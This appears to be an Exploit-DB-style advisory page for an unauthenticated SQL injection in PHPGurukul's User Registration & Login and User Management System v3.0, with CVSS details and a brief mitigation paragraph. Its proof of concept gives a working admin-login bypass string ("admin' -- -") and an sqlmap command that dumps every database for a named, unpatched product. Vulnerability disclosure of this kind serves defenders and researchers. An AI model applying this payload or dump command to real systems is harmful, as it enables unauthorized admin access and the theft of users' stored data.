header-logo
Suggest Exploit
vendor:
User Registration & Login and User Management System
by:
Ashutosh Singh Umath
8.1
CVSS
HIGH
SQL Injection
89
CWE
Product Name: User Registration & Login and User Management System
Affected Version From: 3
Affected Version To: 3
Patch Exists: NO
Related CWE: Requested
CPE: a:phpgurukul:user_registration_login_and_user_management_system:3.0
Metasploit:
Other Scripts:
Platforms Tested: Windows 11
2023

User Registration & Login and User Management System v3.0 – SQL Injection (Unauthenticated)

The User Registration & Login and User Management System v3.0 is vulnerable to SQL Injection. An attacker can exploit this vulnerability to gain unauthorized access to the admin portal and download all the data from the database.

Mitigation:

The vendor should sanitize user input and use parameterized queries to prevent SQL Injection attacks. Regular security audits and code reviews should be conducted to identify and fix any potential vulnerabilities.
Source

Exploit-DB raw data:

# Exploit Title: User Registration & Login and User Management System v3.0 - SQL Injection (Unauthenticated)
# Google Dork: NA
# Date: 19/08/2023
# Exploit Author: Ashutosh Singh Umath
# Vendor Homepage: https://phpgurukul.com
# Software Link:
https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
# Version: 3.0
# Tested on: Windows 11
# CVE : Requested


Proof Of Concept:

1. Navigate to the admin login page.

URL: http://192.168.1.5/loginsystem/admin/

2. Enter "*admin' -- -*" in the admin username field and anything
random in the password field.

3. Now you successfully logged in as admin.

4. To download all the data from the database, use the below commands.

  4.1. Login to the admin portal and capture the request.

  4.2. Copy the intercepted request in a file.

  4.3. Now use the below command to dump all the data


Command:  sqlmap -r <file-name> -p username -D loginsystem --dump-all



Thanks and Regards,

Ashutosh Singh Umath